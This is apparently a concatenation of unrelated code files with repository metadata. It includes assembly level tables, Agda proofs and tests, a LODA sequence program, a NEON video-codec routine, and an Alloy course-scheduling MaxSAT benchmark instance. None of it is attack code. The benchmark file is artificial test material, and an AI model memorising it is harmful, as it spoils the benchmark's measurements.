dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column30Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column31Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE Column32Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b BUMP ; 180-161 dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE ;============================== ORG $FFF6 BANKS_AND_VECTORS ;==============================
scripts/course/models_20210203/sat_60_70_3_6.als	eskang/alloy-maxsat-benchmark	0	2490	abstract sig Day {} one sig Mon, Tue, Wed, Thu, Fri extends Day {} abstract sig Time {} one sig AM, PM extends Time {} abstract sig Course { lectures: set Lecture } one sig C0,C1,C2,C3,C4,C5,C6,C7,C8,C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,C23,C24,C25,C26,C27,C28,C29,C30,C31,C32,C33,C34,C35,C36,C37,C38,C39,C40,C41,C42,C43,C44,C45,C46,C47,C48,C49,C50,C51,C52,C53,C54,C55,C56,C57,C58,C59 extends Course {} fact { lectures = C0 -> MonPM + C0 -> WedPM + C1 -> MonAM + C1 -> WedAM + C2 -> MonAM + C2 -> WedAM + C3 -> MonAM + C3 -> WedAM + C3 -> FriPM + C4 -> TuePM + C4 -> TuePM + C5 -> MonAM + C5 -> WedAM + C6 -> TueAM + C6 -> ThuAM + C7 -> TueAM + C7 -> ThuAM + C8 -> TueAM + C8 -> ThuAM + C9 -> TuePM + C9 -> TuePM + C10 -> MonPM + C10 -> WedPM + C11 -> MonAM + C11 -> WedAM + C12 -> TueAM + C12 -> ThuAM + C13 -> MonAM + C13 -> WedAM + C13 -> FriPM + C14 -> MonAM + C14 -> WedAM + C15 -> TueAM + C15 -> ThuAM + C16 -> MonAM + C16 -> WedAM + C17 -> MonAM + C17 -> WedAM + C18 -> TueAM + C18 -> ThuAM + C19 -> MonAM + C19 -> WedAM + C19 -> FriPM + C20 -> MonAM + C20 -> WedAM + C21 -> MonPM + C21 -> WedPM + C22 -> MonAM + C22 -> WedAM + C22 -> FriPM + C23 -> MonAM + C23 -> WedAM + C23 -> FriPM + C24 -> MonPM + C24 -> WedPM + C25 -> TuePM + C25 -> TuePM + C26 -> MonPM + C26 -> WedPM + C27 -> TuePM + C27 -> TuePM + C28 -> MonPM + C28 -> WedPM + C29 -> MonAM + C29 -> WedAM + C30 -> TueAM + C30 -> ThuAM + C31 -> MonAM + C31 -> WedAM + C32 -> TueAM + C32 -> ThuAM + C33 -> TueAM + C33 -> ThuAM + C34 -> MonAM + C34 -> WedAM + C34 -> FriPM + C35 -> MonAM + C35 -> WedAM + C35 -> FriPM + C36 -> MonAM + C36 -> WedAM + C37 -> MonAM + C37 -> WedAM + C38 -> MonAM + C38 -> WedAM + C38 -> FriPM + C39 -> MonAM + C39 -> WedAM + C39 -> FriPM + C40 -> TuePM + C40 -> TuePM + C41 -> MonAM + C41 -> WedAM + C42 -> MonPM + C42 -> WedPM + C43 -> MonAM + C43 -> WedAM + C44 -> TuePM + C44 -> TuePM + C45 -> MonAM + C45 -> WedAM + C45 -> FriPM + C46 -> MonAM + C46 -> WedAM + C46 -> FriPM + C47 -> MonAM + C47 -> WedAM + C47 -> FriPM + C48 -> TueAM + C48 -> ThuAM + C49 -> MonPM + C49 -> WedPM + C50 -> MonPM + C50 -> WedPM + C51 -> TuePM + C51 -> TuePM + C52 -> TueAM + C52 -> ThuAM + C53 -> MonPM + C53 -> WedPM + C54 -> MonAM + C54 -> WedAM + C54 -> FriPM + C55 -> MonPM + C55 -> WedPM + C56 -> MonAM + C56 -> WedAM + C56 -> FriPM + C57 -> MonAM + C57 -> WedAM + C57 -> FriPM + C58 -> MonAM + C58 -> WedAM + C59 -> TueAM + C59 -> ThuAM } abstract sig Lecture { day: one Day, time: one Time } one sig MonAM, MonPM, TueAM, TuePM, WedAM, WedPM, ThuAM, ThuPM, FriAM, FriPM extends Lecture {} fact { day = MonAM -> Mon + MonPM -> Mon + TueAM -> Tue +TuePM -> Tue + WedAM -> Wed + WedPM -> Wed + ThuAM -> Thu + ThuPM -> Thu + FriAM -> Fri + FriPM -> Fri time = MonAM -> AM + MonPM -> PM + TueAM -> AM +TuePM -> PM + WedAM -> AM + WedPM -> PM + ThuAM -> AM + ThuPM -> PM + FriAM -> AM + FriPM -> PM } abstract sig Student { core: set Course, interests: set Course, courses: set Course } one sig S0 extends Student {} { core = C35 interests = C10 + C35 } one sig S1 extends Student {} { core = C34 interests = C18 + C40 + C42 + C8 } one sig S2 extends Student {} { core = none interests = C59 } one sig S3 extends Student {} { core = C23 interests = C21 + C21 + C5 + C7 + C23 + C0 } one sig S4 extends Student {} { core = C41 + C48 interests = C41 + C28 + C19 } one sig S5 extends Student {} { core = none interests = C53 + C8 + C27 + C2 + C6 + C14 } one sig S6 extends Student {} { core = C22 interests = C50 + C45 + C24 } one sig S7 extends Student {} { core = C11 + C6 + C49 interests = C49 + C43 + C56 + C23 + C54 } one sig S8 extends Student {} { core = C35 + C42 + C25 interests = C42 } one sig S9 extends Student {} { core = C51 interests = C50 + C50 + C26 + C27 } one sig S10 extends Student {} { core = C14 interests = C49 + C49 } one sig S11 extends Student {} { core = C8 + C4 + C20 interests = C20 + C42 } one sig S12 extends Student {} { core = C42 + C46 + C33 interests = C33 + C34 + C24 + C52 + C43 } one sig S13 extends Student {} { core = C2 + C0 interests = C0 + C5 + C55 + C26 } one sig S14 extends Student {} { core = C0 + C51 interests = C0 + C49 + C4 + C41 + C19 } one sig S15 extends Student {} { core = none interests = C57 + C43 + C26 + C53 + C3 + C2 } one sig S16 extends Student {} { core = C0 interests = C5 + C29 + C50 + C4 + C49 } one sig S17 extends Student {} { core = none interests = C11 + C23 + C29 + C59 + C21 } one sig S18 extends Student {} { core = none interests = C43 } one sig S19 extends Student {} { core = C14 + C52 + C26 interests = C26 + C19 + C52 } one sig S20 extends Student {} { core = C14 interests = C25 + C25 + C39 + C41 + C5 + C23 } one sig S21 extends Student {} { core = C47 interests = C55 + C24 + C23 + C8 + C33 } one sig S22 extends Student {} { core = C6 + C45 interests = C6 + C0 + C55 + C9 + C30 } one sig S23 extends Student {} { core = C6 interests = C9 + C11 + C20 + C44 } one sig S24 extends Student {} { core = C13 + C8 interests = C8 + C24 + C0 } one sig S25 extends Student {} { core = C15 + C3 interests = C15 + C36 + C49 + C53 } one sig S26 extends Student {} { core = C4 + C58 + C0 interests = C58 + C55 + C46 + C22 + C23 + C16 } one sig S27 extends Student {} { core = C34 interests = C7 } one sig S28 extends Student {} { core = C59 interests = C26 + C28 + C17 } one sig S29 extends Student {} { core = C20 + C15 interests = C20 + C34 + C25 + C27 } one sig S30 extends Student {} { core = C26 + C5 interests = C26 + C58 + C19 } one sig S31 extends Student {} { core = C43 + C32 + C21 interests = C43 + C21 + C26 + C28 + C55 } one sig S32 extends Student {} { core = C16 + C50 interests = C50 + C59 + C12 + C51 + C30 } one sig S33 extends Student {} { core = C59 interests = C24 + C59 + C21 + C9 + C31 + C27 } one sig S34 extends Student {} { core = none interests = C51 + C45 + C20 + C32 } one sig S35 extends Student {} { core = none interests = C39 + C9 } one sig S36 extends Student {} { core = C49 + C9 + C36 interests = C36 + C45 + C12 } one sig S37 extends Student {} { core = C28 interests = C29 + C5 + C35 + C44 + C14 + C17 } one sig S38 extends Student {} { core = C34 + C32 + C42 interests = C42 + C54 + C26 + C40 + C6 } one sig S39 extends Student {} { core = C54 interests = C21 + C36 + C10 + C15 + C33 + C38 } one sig S40 extends Student {} { core = C9 interests = C34 + C57 + C1 + C38 + C39 + C54 } one sig S41 extends Student {} { core = C34 interests = C24 } one sig S42 extends Student {} { core = C21 + C36 + C52 interests = C36 + C11 + C13 + C12 } one sig S43 extends Student {} { core = C7 interests = C20 + C55 } one sig S44 extends Student {} { core = none interests = C47 } one sig S45 extends Student {} { core = none interests = C52 + C53 + C8 + C48 } one sig S46 extends Student {} { core = C52 + C41 interests = C52 + C41 + C35 + C17 + C5 } one sig S47 extends Student {} { core = C47 + C40 + C21 interests = C40 + C11 + C45 } one sig S48 extends Student {} { core = C57 + C4 + C18 interests = C4 + C26 + C41 + C51 + C23 + C58 } one sig S49 extends Student {} { core = C22 + C10 + C12 interests = C22 + C16 + C33 + C43 } one sig S50 extends Student {} { core = C15 interests = C20 + C20 + C27 + C2 + C6 + C8 } one sig S51 extends Student {} { core = C17 + C7 + C10 interests = C10 + C18 + C15 } one sig S52 extends Student {} { core = C2 + C15 + C50 interests = C2 + C33 + C44 } one sig S53 extends Student {} { core = C47 + C49 interests = C47 + C26 + C11 + C51 } one sig S54 extends Student {} { core = C27 + C7 + C57 interests = C7 + C47 + C4 } one sig S55 extends Student {} { core = C21 + C36 interests = C36 + C16 } one sig S56 extends Student {} { core = C30 + C1 + C28 interests = C28 + C53 + C48 + C1 + C59 } one sig S57 extends Student {} { core = none interests = C49 + C38 + C35 + C41 + C28 } one sig S58 extends Student {} { core = C7 + C46 + C0 interests = C46 + C57 + C6 + C5 + C39 } one sig S59 extends Student {} { core = C34 interests = C10 + C10 + C31 + C46 + C50 + C41 } one sig S60 extends Student {} { core = C31 interests = C28 + C19 } one sig S61 extends Student {} { core = C33 interests = C26 + C36 + C2 + C48 + C50 + C1 } one sig S62 extends Student {} { core = C38 + C24 interests = C38 + C0 + C42 } one sig S63 extends Student {} { core = C14 + C42 + C48 interests = C14 + C20 + C36 } one sig S64 extends Student {} { core = C53 + C2 interests = C2 } one sig S65 extends Student {} { core = C46 + C8 + C44 interests = C8 + C35 + C51 + C13 + C26 + C20 } one sig S66 extends Student {} { core = none interests = C56 + C1 + C34 + C6 } one sig S67 extends Student {} { core = C31 + C30 interests = C31 + C38 } one sig S68 extends Student {} { core = C1 interests = C10 + C41 } one sig S69 extends Student {} { core = none interests = C57 } pred conflict[c1, c2: Course] { some l1, l2: Lecture { l1 in c1.lectures l2 in c2.lectures l1.day = l2.day l1.time = l2.time } } pred validSchedule[courses: Student -> Course] { all stu: Student { #stu.courses > 2 stu.core in stu.courses all disj c1, c2: stu.courses \| not conflict[c1, c2] } } run AnySchedule { validSchedule[courses] all stu: Student \| some stu.interests & stu.courses }
test/Fail/Issue2248_COMPILED_TYPE.agda	Blaisorblade/Agda	3	4580	<gh_stars>1-10 -- Andreas, 2016-10-11, AIM XXIV, issue #2248 -- COMPILED_TYPE should only work on postulates data Unit : Set where unit : Unit postulate IO : Set → Set {-# BUILTIN IO IO #-} {-# COMPILE GHC IO = type IO #-} abstract IO' : Set → Set IO' A = A doNothing : IO' Unit doNothing = unit {-# COMPILE GHC IO' = type IO #-} postulate toIO : {A : Set} → IO' A → IO A {-# COMPILE GHC toIO = \ _ x -> x #-} main : IO Unit main = toIO doNothing
oeis/257/A257235.asm	neoneye/loda-programs	11	247542	<gh_stars>10-100 ; A257235: Decimal expansion of the real root of x^3 + x - 6. ; Submitted by <NAME> ; 1,6,3,4,3,6,5,2,9,3,0,1,3,5,4,3,3,2,3,3,6,8,2,8,4,4,5,6,9,7,8,2,5,2,2,1,0,3,3,7,2,0,4,7,0,3,7,5,4,0,4,7,2,8,1,7,6,9,5,7,4,6,1,2,9,6,2,2,3,1,7,7,9,3,3,3,5,7,3,4,8,6,1,2,0,4,6,1,2,4,9,3,7,9,0,8,8 mov $2,1 mov $3,$0 mul $3,4 lpb $3 add $1,$2 add $5,$2 add $1,$5 add $2,$1 mul $1,2 sub $2,$5 sub $3,1 lpe mov $1,1 add $1,$5 mov $4,10 pow $4,$0 mul $4,2 div $2,$4 lpb $2 mov $6,$2 cmp $6,0 add $2,$6 div $1,$2 mod $2,9 lpe mov $0,$1 mod $0,10
examples/instance-arguments/05-equality-std1.agda	larrytheliquid/agda	0	420	<gh_stars>0 {-# OPTIONS --universe-polymorphism #-} -- {-# OPTIONS --verbose tc.records.ifs:15 #-} -- {-# OPTIONS --verbose tc.constr.findInScope:15 #-} -- {-# OPTIONS --verbose tc.term.args.ifs:15 #-} module 05-equality-std1 where open import Relation.Binary using (IsDecEquivalence; module IsDecEquivalence; Reflexive; module DecSetoid) open import Data.Bool using (false; true; decSetoid) open DecSetoid decSetoid using (isDecEquivalence) open module IsDecEquivalenceWithImplicits = IsDecEquivalence {{...}} using (_≟_) test = false ≟ true test2 : ∀ {a ℓ} {A : Set a} {_≈_} → {{ide : IsDecEquivalence {a} {ℓ} {A} _≈_}} → Reflexive _≈_ test2 = IsDecEquivalenceWithImplicits.refl
popcnt.asm	moskupols/competitive-stl-extensions	3	240259	main: xor eax, eax popcnt eax, edi ret
videocodec/libvpx_internal/libvpx/vp8/encoder/arm/neon/vp8_shortwalsh4x4_neon.asm	Omegaphora/hardware_intel_common_omx-components	49	23283	; ; Copyright (c) 2010 The WebM project authors. All Rights Reserved. ; ; Use of this source code is governed by a BSD-style license ; that can be found in the LICENSE file in the root of the source ; tree. An additional intellectual property rights grant can be found ; in the file PATENTS. All contributing project authors may ; be found in the AUTHORS file in the root of the source tree. ; EXPORT \|vp8_short_walsh4x4_neon\| ARM REQUIRE8 PRESERVE8 AREA \|\|.text\|\|, CODE, READONLY, ALIGN=2 ;void vp8_short_walsh4x4_neon(short input, short output, int pitch) ; r0 short input, ; r1 short output, ; r2 int pitch \|vp8_short_walsh4x4_neon\| PROC vld1.16 {d0}, [r0@64], r2 ; load input vld1.16 {d1}, [r0@64], r2 vld1.16 {d2}, [r0@64], r2 vld1.16 {d3}, [r0@64] ;First for-loop ;transpose d0, d1, d2, d3. Then, d0=ip[0], d1=ip[1], d2=ip[2], d3=ip[3] vtrn.32 d0, d2 vtrn.32 d1, d3 vmov.s32 q15, #3 ; add 3 to all values vtrn.16 d0, d1 vtrn.16 d2, d3 vadd.s16 d4, d0, d2 ; ip[0] + ip[2] vadd.s16 d5, d1, d3 ; ip[1] + ip[3] vsub.s16 d6, d1, d3 ; ip[1] - ip[3] vsub.s16 d7, d0, d2 ; ip[0] - ip[2] vshl.s16 d4, d4, #2 ; a1 = (ip[0] + ip[2]) << 2 vshl.s16 d5, d5, #2 ; d1 = (ip[1] + ip[3]) << 2 vshl.s16 d6, d6, #2 ; c1 = (ip[1] - ip[3]) << 2 vceq.s16 d16, d4, #0 ; a1 == 0 vshl.s16 d7, d7, #2 ; b1 = (ip[0] - ip[2]) << 2 vadd.s16 d0, d4, d5 ; a1 + d1 vmvn d16, d16 ; a1 != 0 vsub.s16 d3, d4, d5 ; op[3] = a1 - d1 vadd.s16 d1, d7, d6 ; op[1] = b1 + c1 vsub.s16 d2, d7, d6 ; op[2] = b1 - c1 vsub.s16 d0, d0, d16 ; op[0] = a1 + d1 + (a1 != 0) ;Second for-loop ;transpose d0, d1, d2, d3, Then, d0=ip[0], d1=ip[4], d2=ip[8], d3=ip[12] vtrn.32 d1, d3 vtrn.32 d0, d2 vtrn.16 d2, d3 vtrn.16 d0, d1 vaddl.s16 q8, d0, d2 ; a1 = ip[0]+ip[8] vaddl.s16 q9, d1, d3 ; d1 = ip[4]+ip[12] vsubl.s16 q10, d1, d3 ; c1 = ip[4]-ip[12] vsubl.s16 q11, d0, d2 ; b1 = ip[0]-ip[8] vadd.s32 q0, q8, q9 ; a2 = a1 + d1 vadd.s32 q1, q11, q10 ; b2 = b1 + c1 vsub.s32 q2, q11, q10 ; c2 = b1 - c1 vsub.s32 q3, q8, q9 ; d2 = a1 - d1 vclt.s32 q8, q0, #0 vclt.s32 q9, q1, #0 vclt.s32 q10, q2, #0 vclt.s32 q11, q3, #0 ; subtract -1 (or 0) vsub.s32 q0, q0, q8 ; a2 += a2 < 0 vsub.s32 q1, q1, q9 ; b2 += b2 < 0 vsub.s32 q2, q2, q10 ; c2 += c2 < 0 vsub.s32 q3, q3, q11 ; d2 += d2 < 0 vadd.s32 q8, q0, q15 ; a2 + 3 vadd.s32 q9, q1, q15 ; b2 + 3 vadd.s32 q10, q2, q15 ; c2 + 3 vadd.s32 q11, q3, q15 ; d2 + 3 ; vrshrn? would add 1 << 3-1 = 2 vshrn.s32 d0, q8, #3 vshrn.s32 d1, q9, #3 vshrn.s32 d2, q10, #3 vshrn.s32 d3, q11, #3 vst1.16 {q0, q1}, [r1@128] bx lr ENDP END
Agda/10-truncation-levels.agda	hemangandhi/HoTT-Intro	0	3185	{-# OPTIONS --without-K --exact-split #-} module 10-truncation-levels where import 09-fundamental-theorem open 09-fundamental-theorem public -- Section 8.1 Propositions is-prop : {i : Level} (A : UU i) → UU i is-prop A = (x y : A) → is-contr (Id x y) {- We introduce the universe of all propositions. -} UU-Prop : (l : Level) → UU (lsuc l) UU-Prop l = Σ (UU l) is-prop type-Prop : {l : Level} → UU-Prop l → UU l type-Prop P = pr1 P is-prop-type-Prop : {l : Level} (P : UU-Prop l) → is-prop (type-Prop P) is-prop-type-Prop P = pr2 P {- The empty type is a proposition. -} abstract is-prop-empty : is-prop empty is-prop-empty () abstract is-prop-unit : is-prop unit is-prop-unit = is-prop-is-contr is-contr-unit unit-Prop : UU-Prop lzero unit-Prop = pair unit is-prop-unit is-prop' : {i : Level} (A : UU i) → UU i is-prop' A = (x y : A) → Id x y abstract is-prop-is-prop' : {i : Level} {A : UU i} → is-prop' A → is-prop A is-prop-is-prop' {i} {A} H x y = pair ( (inv (H x x)) ∙ (H x y)) ( ind-Id x ( λ z p → Id ((inv (H x x)) ∙ (H x z)) p) ( left-inv (H x x)) y) abstract is-prop'-is-prop : {i : Level} {A : UU i} → is-prop A → is-prop' A is-prop'-is-prop H x y = pr1 (H x y) abstract is-contr-is-prop-inh : {i : Level} {A : UU i} → is-prop A → A → is-contr A is-contr-is-prop-inh H a = pair a (is-prop'-is-prop H a) abstract is-prop-is-contr-if-inh : {i : Level} {A : UU i} → (A → is-contr A) → is-prop A is-prop-is-contr-if-inh H x y = is-prop-is-contr (H x) x y is-subtype : {i j : Level} {A : UU i} (B : A → UU j) → UU (i ⊔ j) is-subtype B = (x : _) → is-prop (B x) double-structure-swap : {l1 l2 l3 : Level} (A : UU l1) (B : A → UU l2) (C : A → UU l3) → Σ (Σ A B) (λ t → C (pr1 t)) → Σ (Σ A C) (λ t → B (pr1 t)) double-structure-swap A B C (pair (pair a b) c) = (pair (pair a c) b) htpy-double-structure-swap : {l1 l2 l3 : Level} (A : UU l1) (B : A → UU l2) (C : A → UU l3) → ((double-structure-swap A C B) ∘ (double-structure-swap A B C)) ~ id htpy-double-structure-swap A B C (pair (pair a b) c) = eq-pair (eq-pair refl refl) refl is-equiv-double-structure-swap : {l1 l2 l3 : Level} (A : UU l1) (B : A → UU l2) (C : A → UU l3) → is-equiv (double-structure-swap A B C) is-equiv-double-structure-swap A B C = is-equiv-has-inverse ( double-structure-swap A C B) ( htpy-double-structure-swap A C B) ( htpy-double-structure-swap A B C) {- The following is a general construction that will help us show that the identity type of a subtype agrees with the identity type of the original type. We already know that the first projection of a family of propositions is an embedding, but the following lemma still has its uses. -} abstract is-contr-total-Eq-substructure : {l1 l2 l3 : Level} {A : UU l1} {B : A → UU l2} {P : A → UU l3} → is-contr (Σ A B) → (is-subtype P) → (a : A) (b : B a) (p : P a) → is-contr (Σ (Σ A P) (λ t → B (pr1 t))) is-contr-total-Eq-substructure {A = A} {B} {P} is-contr-AB is-subtype-P a b p = is-contr-is-equiv ( Σ (Σ A B) (λ t → P (pr1 t))) ( double-structure-swap A P B) ( is-equiv-double-structure-swap A P B) ( is-contr-is-equiv' ( P a) ( left-unit-law-Σ-map-gen (λ t → P (pr1 t)) is-contr-AB (pair a b)) ( is-equiv-left-unit-law-Σ-map-gen _ is-contr-AB (pair a b)) ( is-contr-is-prop-inh (is-subtype-P a) p)) Eq-total-subtype : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} → is-subtype B → (Σ A B) → (Σ A B) → UU l1 Eq-total-subtype is-subtype-B p p' = Id (pr1 p) (pr1 p') reflexive-Eq-total-subtype : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} (is-subtype-B : is-subtype B) → (p : Σ A B) → Eq-total-subtype is-subtype-B p p reflexive-Eq-total-subtype is-subtype-B (pair x y) = refl Eq-total-subtype-eq : {l1 l2 : Level} {A : UU l1} {B : A → UU l2} (is-subtype-B : is-subtype B) → (p p' : Σ A B) → Id p p' → Eq-total-subtype is-subtype-B p p' Eq-total-subtype-eq is-subtype-B p .p refl = reflexive-Eq-total-subtype is-subtype-B p is-contr-total-Eq-total-subtype : 